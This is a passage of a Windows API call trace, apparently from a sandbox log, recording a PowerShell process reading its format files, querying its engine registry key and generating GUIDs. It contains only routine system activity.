	[0589.624] ReadFile (in: hFile=0x330, lpBuffer=0x35df3b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd138, lpOverlapped=0x0 | out: lpBuffer=0x35df3b0*, lpNumberOfBytesRead=0xcd138*=0x0, lpOverlapped=0x0) returned 1
	[0589.624] CloseHandle (hObject=0x330) returned 1
	[0589.625] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0xcce80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0589.625] SetErrorMode (uMode=0x1) returned 0x1
	[0589.625] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xcd0e0 | out: lpFileInformation=0xcd0e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e51ae9, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e51ae9, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e9c3af, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3ef37)) returned 1
	[0589.625] SetErrorMode (uMode=0x1) returned 0x1
	[0589.625] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0xcce10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0589.625] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd1c8 | out: phkResult=0xcd1c8*=0x330) returned 0x0
	[0589.625] RegQueryValueExW (in: hKey=0x330, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcd14c, lpData=0x0, lpcbData=0xcd148*=0x0 | out: lpType=0xcd14c*=0x1, lpData=0x0, lpcbData=0xcd148*=0x56) returned 0x0
	[0589.625] CoTaskMemAlloc (cb=0x5a) returned 0x345800
	[0589.625] RegQueryValueExW (in: hKey=0x330, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcd11c, lpData=0x345800, lpcbData=0xcd118*=0x56 | out: lpType=0xcd11c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xcd118*=0x56) returned 0x0
	[0589.625] CoTaskMemFree (pv=0x345800) 
	[0589.626] RegCloseKey (hKey=0x330) returned 0x0
	[0589.626] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0xcce10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0589.626] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0xcccc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0589.641] CoCreateGuid (in: pguid=0xcd3f0 | out: pguid=0xcd3f0*(Data1=0x4fe53cf, Data2=0x1300, Data3=0x464c, Data4=([0]=0x83, [1]=0x46, [2]=0x6b, [3]=0x4e, [4]=0x4a, [5]=0x6, [6]=0x2e, [7]=0xbe))) returned 0x0
	[0589.642] CoCreateGuid (in: pguid=0xcd3f0 | out: pguid=0xcd3f0*(Data1=0x2be4e532, Data2=0x8d1e, Data3=0x45cd, Data4=([0]=0x89, [1]=0x0, [2]=0x39, [3]=0xf2, [4]=0x10, [5]=0xdc, [6]=0x44, [7]=0xe1))) returned 0x0
	[0589.642] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc890, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0589.643] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0589.643] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0589.643] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0590.935] CoCreateGuid (in: pguid=0xcd3f0 | out: pguid=0xcd3f0*(Data1=0xd7cecd3e, Data2=0x6778, Data3=0x4617, Data4=([0]=0xbc, [1]=0xa6, [2]=0xcf, [3]=0x36, [4]=0x12, [5]=0xc3, [6]=0xad, [7]=0x24))) returned 0x0
	[0590.936] VirtualQuery (in: lpAddress=0xcb400, lpBuffer=0xcc2c0, dwLength=0x30 | out: lpBuffer=0xcc2c0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0590.937] VirtualQuery (in: lpAddress=0xcb490, lpBuffer=0xcc350, dwLength=0x30 | out: lpBuffer=0xcc350*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0590.938] CoCreateGuid (in: pguid=0xcd3f0 | out: pguid=0xcd3f0*(Data1=0x9f9886f7, Data2=0xc656, Data3=0x486b, Data4=([0]=0xa3, [1]=0x89, [2]=0x99, [3]=0xc5, [4]=0xbd, [5]=0x56, [6]=0x34, [7]=0x26))) returned 0x0
	[0592.214] CoCreateGuid (in: pguid=0xcd3f0 | out: pguid=0xcd3f0*(Data1=0xd57e49a7, Data2=0x7c79, Data3=0x4d9b, Data4=([0]=0xa6, [1]=0x1a, [2]=0xb1, [3]=0xef, [4]=0xe8, [5]=0x2a, [6]=0x1, [7]=0x35))) returned 0x0
	[0592.215] CoCreateGuid (in: pguid=0xcd3f0 | out: pguid=0xcd3f0*(Data1=0x3360f9e2, Data2=0x38b8, Data3=0x43a9, Data4=([0]=0xb4, [1]=0x52, [2]=0x21, [3]=0x53, [4]=0xb2, [5]=0x3f, [6]=0x98, [7]=0xe6))) returned 0x0
	[0593.342] CoCreateGuid (in: pguid=0xcd3f0 | out: pguid=0xcd3f0*(Data1=0x9a08a417, Data2=0x7665, Data3=0x4fc2, Data4=([0]=0x9b, [1]=0x21, [2]=0x72, [3]=0xab, [4]=0x2, [5]=0xcf, [6]=0x34, [7]=0x7e))) returned 0x0
	[0593.343] CoCreateGuid (in: pguid=0xcd3f0 | out: pguid=0xcd3f0*(Data1=0xfb30868f, Data2=0xce01, Data3=0x40bc, Data4=([0]=0xb1, [1]=0xba, [2]=0x4, [3]=0x33, [4]=0x2b, [5]=0xe, [6]=0xb0, [7]=0xa3))) returned 0x0
	[0593.343] CoCreateGuid (in: pguid=0xcd3f0 | out: pguid=0xcd3f0*(Data1=0x1ee08c06, Data2=0xee13, Data3=0x4264, Data4=([0]=0xbc, [1]=0xe8, [2]=0xb7, [3]=0x38, [4]=0x2d, [5]=0x4, [6]=0x97, [7]=0xb9))) returned 0x0
	[0593.344] CoCreateGuid (in: pguid=0xcd3f0 | out: pguid=0xcd3f0*(Data1=0xb6cb5a93, Data2=0x1e, Data3=0x4f5b, Data4=([0]=0xa3, [1]=0x7e, [2]=0x14, [3]=0xe0, [4]=0x8a, [5]=0xa9, [6]=0xde, [7]=0xbf))) returned 0x0
	[0593.344] CoCreateGuid (in: pguid=0xcd3f0 | out: pguid=0xcd3f0*(Data1=0x9752976, Data2=0x5bd3, Data3=0x4bac, Data4=([0]=0xa1, [1]=0x3b, [2]=0x91, [3]=0xe0, [4]=0x6f, [5]=0x3d, [6]=0x82, [7]=0xbc))) returned 0x0
	[0593.344] CoCreateGuid (in: pguid=0xcd3f0 | out: pguid=0xcd3f0*(Data1=0x36e806ab, Data2=0x3a40, Data3=0x4d9e, Data4=([0]=0xa6, [1]=0x47, [2]=0x1b, [3]=0xf5, [4]=0xcd, [5]=0xc6, [6]=0xc8, [7]=0x9a))) returned 0x0
	[0593.344] CoCreateGuid (in: pguid=0xcd3f0 | out: pguid=0xcd3f0*(Data1=0xbb99e927, Data2=0xe257, Data3=0x4d0d, Data4=([0]=0x92, [1]=0xf4, [2]=0x25, [3]=0x68, [4]=0x44, [5]=0xa2, [6]=0xb7, [7]=0x7e))) returned 0x0
	[0593.344] CoCreateGuid (in: pguid=0xcd3f0 | out: pguid=0xcd3f0*(Data1=0xb55f8ccf, Data2=0x56de, Data3=0x43a5, Data4=([0]=0x8b, [1]=0x77, [2]=0x7a, [3]=0xce, [4]=0x93, [5]=0x4d, [6]=0xd2, [7]=0xe9))) returned 0x0
	[0593.345] CoCreateGuid (in: pguid=0xcd3f0 | out: pguid=0xcd3f0*(Data1=0x84b5685f, Data2=0xcc1a, Data3=0x421d, Data4=([0]=0x8f, [1]=0x89, [2]=0x7a, [3]=0x3e, [4]=0x84, [5]=0xea, [6]=0x46, [7]=0x48))) returned 0x0
	[0593.346] CoCreateGuid (in: pguid=0xcd3f0 | out: pguid=0xcd3f0*(Data1=0x5448689e, Data2=0x6a2a, Data3=0x40fc, Data4=([0]=0x87, [1]=0x19, [2]=0xb1, [3]=0xd6, [4]=0xdb, [5]=0x8f, [6]=0xf8, [7]=0x75))) returned 0x0
	[0593.347] CoCreateGuid (in: pguid=0xcd3f0 | out: pguid=0xcd3f0*(Data1=0x83e166ff, Data2=0x11d9, Data3=0x4286, Data4=([0]=0x91, [1]=0xfb, [2]=0x1f, [3]=0xcd, [4]=0x31, [5]=0xbd, [6]=0x3a, [7]=0xba))) returned 0x0
	[0593.348] CoCreateGuid (in: pguid=0xcd3f0 | out: pguid=0xcd3f0*(Data1=0xa6e91d8c, Data2=0x6d12, Data3=0x4283, Data4=([0]=0x93, [1]=0xe2, [2]=0x1d, [3]=0x92, [4]=0xe3, [5]=0x50, [6]=0xda, [7]=0xa2))) returned 0x0
	[0593.348] CoCreateGuid (in: pguid=0xcd3f0 | out: pguid=0xcd3f0*(Data1=0xffa66372, Data2=0x4431, Data3=0x4b7e, Data4=([0]=0xb2, [1]=0xab, [2]=0x81, [3]=0x68, [4]=0xfc, [5]=0x19, [6]=0xfb, [7]=0x64))) returned 0x0
	[0593.348] CoCreateGuid (in: pguid=0xcd3f0 | out: pguid=0xcd3f0*(Data1=0x16793e2d, Data2=0x2c4a, Data3=0x4b71, Data4=([0]=0x92, [1]=0x2e, [2]=0x48, [3]=0xb1, [4]=0xe2, [5]=0xc7, [6]=0x68, [7]=0x47))) returned 0x0
	[0593.349] CoCreateGuid (in: pguid=0xcd3f0 | out: pguid=0xcd3f0*(Data1=0x8f2b6785, Data2=0x84d9, Data3=0x4da0, Data4=([0]=0x88, [1]=0x17, [2]=0x4f, [3]=0x72, [4]=0xf8, [5]=0x60, [6]=0x82, [7]=0x25))) returned 0x0
	[0593.349] CoCreateGuid (in: pguid=0xcd3f0 | out: pguid=0xcd3f0*(Data1=0xe20bb9b, Data2=0x5c0b, Data3=0x4d72, Data4=([0]=0x86, [1]=0x97, [2]=0x1, [3]=0x89, [4]=0xc9, [5]=0x98, [6]=0x61, [7]=0x6))) returned 0x0
	[0593.349] CoCreateGuid (in: pguid=0xcd3f0 | out: pguid=0xcd3f0*(Data1=0x40c68ac6, Data2=0x4e67, Data3=0x4fe5, Data4=([0]=0xb3, [1]=0xbc, [2]=0xbd, [3]=0x79, [4]=0xd4, [5]=0x25, [6]=0x9d, [7]=0x1f))) returned 0x0
	[0593.349] CoCreateGuid (in: pguid=0xcd3f0 | out: pguid=0xcd3f0*(Data1=0xb0dc9e84, Data2=0x5878, Data3=0x4218, Data4=([0]=0x9a, [1]=0xec, [2]=0xa7, [3]=0xa6, [4]=0x5e, [5]=0xa5, [6]=0xef, [7]=0xe8))) returned 0x0
	[0593.349] CoCreateGuid (in: pguid=0xcd3f0 | out: pguid=0xcd3f0*(Data1=0x9362abce, Data2=0x2542, Data3=0x4614, Data4=([0]=0xbf, [1]=0x4f, [2]=0x80, [3]=0x17, [4]=0xa9, [5]=0xa9, [6]=0xd6, [7]=0x19))) returned 0x0
	[0593.350] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x330
	[0593.350] GetFileType (hFile=0x330) returned 0x1
	[0593.350] SetErrorMode (uMode=0x1) returned 0x1
	[0593.350] GetFileType (hFile=0x330) returned 0x1
	[0593.350] ReadFile (in: hFile=0x330, lpBuffer=0x369a998, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd138, lpOverlapped=0x0 | out: lpBuffer=0x369a998*, lpNumberOfBytesRead=0xcd138*=0x1000, lpOverlapped=0x0) returned 1
	[0593.350] ReadFile (in: hFile=0x330, lpBuffer=0x369a998, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd138, lpOverlapped=0x0 | out: lpBuffer=0x369a998*, lpNumberOfBytesRead=0xcd138*=0x1000, lpOverlapped=0x0) returned 1
	[0593.350] ReadFile (in: hFile=0x330, lpBuffer=0x369a998, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd138, lpOverlapped=0x0 | out: lpBuffer=0x369a998*, lpNumberOfBytesRead=0xcd138*=0x1000, lpOverlapped=0x0) returned 1
	[0593.351] ReadFile (in: hFile=0x330, lpBuffer=0x369a998, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd138, lpOverlapped=0x0 | out: lpBuffer=0x369a998*, lpNumberOfBytesRead=0xcd138*=0x1000, lpOverlapped=0x0) returned 1
	[0593.351] ReadFile (in: hFile=0x330, lpBuffer=0x369a998, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd138, lpOverlapped=0x0 | out: lpBuffer=0x369a998*, lpNumberOfBytesRead=0xcd138*=0x1000, lpOverlapped=0x0) returned 1
	[0593.351] ReadFile (in: hFile=0x330, lpBuffer=0x369a998, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd138, lpOverlapped=0x0 | out: lpBuffer=0x369a998*, lpNumberOfBytesRead=0xcd138*=0x1000, lpOverlapped=0x0) returned 1
	[0593.351] ReadFile (in: hFile=0x330, lpBuffer=0x369a998, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd138, lpOverlapped=0x0 | out: lpBuffer=0x369a998*, lpNumberOfBytesRead=0xcd138*=0x1000, lpOverlapped=0x0) returned 1
	[0593.351] ReadFile (in: hFile=0x330, lpBuffer=0x369a998, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd138, lpOverlapped=0x0 | out: lpBuffer=0x369a998*, lpNumberOfBytesRead=0xcd138*=0x1000, lpOverlapped=0x0) returned 1
	[0593.351] ReadFile (in: hFile=0x330, lpBuffer=0x369a998, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd138, lpOverlapped=0x0 | out: lpBuffer=0x369a998*, lpNumberOfBytesRead=0xcd138*=0x1000, lpOverlapped=0x0) returned 1
	[0593.353] ReadFile (in: hFile=0x330, lpBuffer=0x369a998, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd138, lpOverlapped=0x0 | out: lpBuffer=0x369a998*, lpNumberOfBytesRead=0xcd138*=0x1000, lpOverlapped=0x0) returned 1
	[0593.353] ReadFile (in: hFile=0x330, lpBuffer=0x369a998, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd138, lpOverlapped=0x0 | out: lpBuffer=0x369a998*, lpNumberOfBytesRead=0xcd138*=0x1000, lpOverlapped=0x0) returned 1
	[0593.354] ReadFile (in: hFile=0x330, lpBuffer=0x369a998, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd138, lpOverlapped=0x0 | out: lpBuffer=0x369a998*, lpNumberOfBytesRead=0xcd138*=0x1000, lpOverlapped=0x0) returned 1
	[0593.354] ReadFile (in: hFile=0x330, lpBuffer=0x369a998, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd138, lpOverlapped=0x0 | out: lpBuffer=0x369a998*, lpNumberOfBytesRead=0xcd138*=0x1000, lpOverlapped=0x0) returned 1
	[0593.354] ReadFile (in: hFile=0x330, lpBuffer=0x369a998, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd138, lpOverlapped=0x0 | out: lpBuffer=0x369a998*, lpNumberOfBytesRead=0xcd138*=0x1000, lpOverlapped=0x0) returned 1
	[0593.354] ReadFile (in: hFile=0x330, lpBuffer=0x369a998, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd138, lpOverlapped=0x0 | out: lpBuffer=0x369a998*, lpNumberOfBytesRead=0xcd138*=0x1000, lpOverlapped=0x0) returned 1
	[0593.355] ReadFile (in: hFile=0x330, lpBuffer=0x369a998, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd138, lpOverlapped=0x0 | out: lpBuffer=0x369a998*, lpNumberOfBytesRead=0xcd138*=0x1000, lpOverlapped=0x0) returned 1
	[0593.355] ReadFile (in: hFile=0x330, lpBuffer=0x369a998, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd138, lpOverlapped=0x0 | out: lpBuffer=0x369a998*, lpNumberOfBytesRead=0xcd138*=0x1000, lpOverlapped=0x0) returned 1
	[0593.357] ReadFile (in: hFile=0x330, lpBuffer=0x369a998, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd138, lpOverlapped=0x0 | out: lpBuffer=0x369a998*, lpNumberOfBytesRead=0xcd138*=0x1000, lpOverlapped=0x0) returned 1
	[0593.358] ReadFile (in: hFile=0x330, lpBuffer=0x369a998, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd138, lpOverlapped=0x0 | out: lpBuffer=0x369a998*, lpNumberOfBytesRead=0xcd138*=0x1000, lpOverlapped=0x0) returned 1
	[0593.358] ReadFile (in: hFile=0x330, lpBuffer=0x369a998, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd138, lpOverlapped=0x0 | out: lpBuffer=0x369a998*, lpNumberOfBytesRead=0xcd138*=0x1000, lpOverlapped=0x0) returned 1
	[0593.358] ReadFile (in: hFile=0x330, lpBuffer=0x369a998, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd138, lpOverlapped=0x0 | out: lpBuffer=0x369a998*, lpNumberOfBytesRead=0xcd138*=0x1000, lpOverlapped=0x0) returned 1
	[0593.359] ReadFile (in: hFile=0x330, lpBuffer=0x369a998, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd138, lpOverlapped=0x0 | out: lpBuffer=0x369a998*, lpNumberOfBytesRead=0xcd138*=0xe67, lpOverlapped=0x0) returned 1
	[0593.359] ReadFile (in: hFile=0x330, lpBuffer=0x3699f67, nNumberOfBytesToRead=0x199, lpNumberOfBytesRead=0xcd138, lpOverlapped=0x0 | out: lpBuffer=0x3699f67*, lpNumberOfBytesRead=0xcd138*=0x0, lpOverlapped=0x0) returned 1
	[0593.359] ReadFile (in: hFile=0x330, lpBuffer=0x369a998, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd138, lpOverlapped=0x0 | out: lpBuffer=0x369a998*, lpNumberOfBytesRead=0xcd138*=0x0, lpOverlapped=0x0) returned 1
	[0593.359] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd1c8 | out: phkResult=0xcd1c8*=0x330) returned 0x0
	[0593.360] RegQueryValueExW (in: hKey=0x330, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcd14c, lpData=0x0, lpcbData=0xcd148*=0x0 | out: lpType=0xcd14c*=0x1, lpData=0x0, lpcbData=0xcd148*=0x56) returned 0x0
	[0593.360] CoTaskMemAlloc (cb=0x5a) returned 0x345800
	[0593.360] RegQueryValueExW (in: hKey=0x330, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcd11c, lpData=0x345800, lpcbData=0xcd118*=0x56 | out: lpType=0xcd11c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xcd118*=0x56) returned 0x0
	[0593.360] CoTaskMemFree (pv=0x345800) 
	[0593.360] RegCloseKey (hKey=0x330) returned 0x0
	[0593.360] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0xcce10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0593.360] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0xcccc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0593.377] CoCreateGuid (in: pguid=0xcd3f0 | out: pguid=0xcd3f0*(Data1=0xa68735a7, Data2=0xebe3, Data3=0x4207, Data4=([0]=0xae, [1]=0xe1, [2]=0x51, [3]=0x47, [4]=0xcb, [5]=0x2c, [6]=0x2d, [7]=0x3b))) returned 0x0
	[0593.377] CoCreateGuid (in: pguid=0xcd3f0 | out: pguid=0xcd3f0*(Data1=0x4b30bc24, Data2=0xc13c, Data3=0x4bbc, Data4=([0]=0xaa, [1]=0xbb, [2]=0x7e, [3]=0x1c, [4]=0x2, [5]=0xe2, [6]=0x3e, [7]=0x84))) returned 0x0
	[0593.377] CoCreateGuid (in: pguid=0xcd3f0 | out: pguid=0xcd3f0*(Data1=0x56988820, Data2=0x8f48, Data3=0x4f40, Data4=([0]=0xa8, [1]=0x3a, [2]=0x47, [3]=0x49, [4]=0xff, [5]=0x75, [6]=0xb, [7]=0xa7))) returned 0x0
	[0593.378] CoCreateGuid (in: pguid=0xcd3f0 | out: pguid=0xcd3f0*(Data1=0x28577291, Data2=0xa7f8, Data3=0x4e9f, Data4=([0]=0x92, [1]=0xc4, [2]=0x47, [3]=0x91, [4]=0xd6, [5]=0xf7, [6]=0xf8, [7]=0xdc))) returned 0x0
	[0593.378] CoCreateGuid (in: pguid=0xcd3f0 | out: pguid=0xcd3f0*(Data1=0x510401c6, Data2=0x596a, Data3=0x47a5, Data4=([0]=0xa3, [1]=0xa6, [2]=0xab, [3]=0x6, [4]=0x68, [5]=0x48, [6]=0x92, [7]=0x4e))) returned 0x0
	[0593.378] CoCreateGuid (in: pguid=0xcd3f0 | out: pguid=0xcd3f0*(Data1=0xa1a5aef9, Data2=0x782c, Data3=0x457b, Data4=([0]=0xb1, [1]=0xf7, [2]=0x48, [3]=0x5c, [4]=0xf4, [5]=0x84, [6]=0xe0, [7]=0x65))) returned 0x0
	[0593.378] CoCreateGuid (in: pguid=0xcd3f0 | out: pguid=0xcd3f0*(Data1=0xb5d52e92, Data2=0xa985, Data3=0x43dc, Data4=([0]=0x83, [1]=0x4, [2]=0x45, [3]=0xeb, [4]=0x4d, [5]=0x9c, [6]=0xe6, [7]=0x99))) returned 0x0
	[0593.378] CoCreateGuid (in: pguid=0xcd3f0 | out: pguid=0xcd3f0*(Data1=0x92fd0c88, Data2=0x10d8, Data3=0x40fc, Data4=([0]=0x95, [1]=0x2e, [2]=0x48, [3]=0xa1, [4]=0xd8, [5]=0xcd, [6]=0xea, [7]=0xce))) returned 0x0
	[0593.378] CoCreateGuid (in: pguid=0xcd3f0 | out: pguid=0xcd3f0*(Data1=0x6ae5887b, Data2=0x810b, Data3=0x419a, Data4=([0]=0x9d, [1]=0x1d, [2]=0x65, [3]=0x45, [4]=0x88, [5]=0x1b, [6]=0x81, [7]=0x76))) returned 0x0
	[0593.379] CoCreateGuid (in: pguid=0xcd3f0 | out: pguid=0xcd3f0*(Data1=0xda2801e6, Data2=0xfe80, Data3=0x4ef3, Data4=([0]=0x8d, [1]=0xd, [2]=0xc6, [3]=0x8c, [4]=0x77, [5]=0x8d, [6]=0x13, [7]=0x9f))) returned 0x0
	[0593.379] CoCreateGuid (in: pguid=0xcd3f0 | out: pguid=0xcd3f0*(Data1=0x7bb5e854, Data2=0xc9ce, Data3=0x40df, Data4=([0]=0xbc, [1]=0xb2, [2]=0x4, [3]=0xfd, [4]=0x97, [5]=0x9e, [6]=0x42, [7]=0xfc))) returned 0x0
	[0593.379] CoCreateGuid (in: pguid=0xcd3f0 | out: pguid=0xcd3f0*(Data1=0x45fe073e, Data2=0x829f, Data3=0x46f9, Data4=([0]=0x81, [1]=0x47, [2]=0xdc, [3]=0x87, [4]=0x79, [5]=0xf6, [6]=0x85, [7]=0xe))) returned 0x0
	[0593.379] CoCreateGuid (in: pguid=0xcd3f0 | out: pguid=0xcd3f0*(Data1=0x267722c3, Data2=0xf338, Data3=0x4066, Data4=([0]=0xb5, [1]=0x3d, [2]=0x96, [3]=0x59, [4]=0x80, [5]=0x50, [6]=0x40, [7]=0x48))) returned 0x0
	[0593.379] CoCreateGuid (in: pguid=0xcd3f0 | out: pguid=0xcd3f0*(Data1=0xf838cd19, Data2=0x7dcb, Data3=0x433a, Data4=([0]=0x97, [1]=0x61, [2]=0x28, [3]=0xaa, [4]=0x97, [5]=0xec, [6]=0x8a, [7]=0x6c))) returned 0x0
	[0593.379] CoCreateGuid (in: pguid=0xcd3f0 | out: pguid=0xcd3f0*(Data1=0x444a5852, Data2=0xb9a5, Data3=0x4860, Data4=([0]=0xaa, [1]=0xa1, [2]=0xaf, [3]=0xc7, [4]=0x2f, [5]=0xda, [6]=0x7f, [7]=0x3f))) returned 0x0
	[0593.380] CoCreateGuid (in: pguid=0xcd3f0 | out: pguid=0xcd3f0*(Data1=0xba944be8, Data2=0x3718, Data3=0x4668, Data4=([0]=0x8c, [1]=0x48, [2]=0x80, [3]=0xeb, [4]=0xce, [5]=0xbb, [6]=0x12, [7]=0xda))) returned 0x0
	[0593.380] CoCreateGuid (in: pguid=0xcd3f0 | out: pguid=0xcd3f0*(Data1=0x43f87c67, Data2=0x2638, Data3=0x4713, Data4=([0]=0x85, [1]=0x80, [2]=0xfb, [3]=0x2d, [4]=0x27, [5]=0x17, [6]=0x3d, [7]=0xb7))) returned 0x0
	[0593.380] CoCreateGuid (in: pguid=0xcd3f0 | out: pguid=0xcd3f0*(Data1=0x417b65ff, Data2=0xd1fc, Data3=0x4429, Data4=([0]=0xa8, [1]=0x71, [2]=0x52, [3]=0xd5, [4]=0x93, [5]=0x9f, [6]=0x7e, [7]=0xec))) returned 0x0
	[0593.380] CoCreateGuid (in: pguid=0xcd3f0 | out: pguid=0xcd3f0*(Data1=0x4796080f, Data2=0x62c9, Data3=0x4934, Data4=([0]=0x99, [1]=0x83, [2]=0x8c, [3]=0x93, [4]=0x9e, [5]=0xc9, [6]=0x3f, [7]=0x59))) returned 0x0
	[0594.551] CoCreateGuid (in: pguid=0xcd3f0 | out: pguid=0xcd3f0*(Data1=0x94a7fd63, Data2=0xe9e9, Data3=0x4585, Data4=([0]=0xb0, [1]=0xd7, [2]=0xa1, [3]=0x7c, [4]=0x31, [5]=0x9c, [6]=0xcc, [7]=0x19))) returned 0x0
	[0594.551] CoCreateGuid (in: pguid=0xcd3f0 | out: pguid=0xcd3f0*(Data1=0xfce64dc9, Data2=0xacaa, Data3=0x49bb, Data4=([0]=0xa5, [1]=0x29, [2]=0x68, [3]=0xa0, [4]=0x89, [5]=0x53, [6]=0x85, [7]=0x0))) returned 0x0
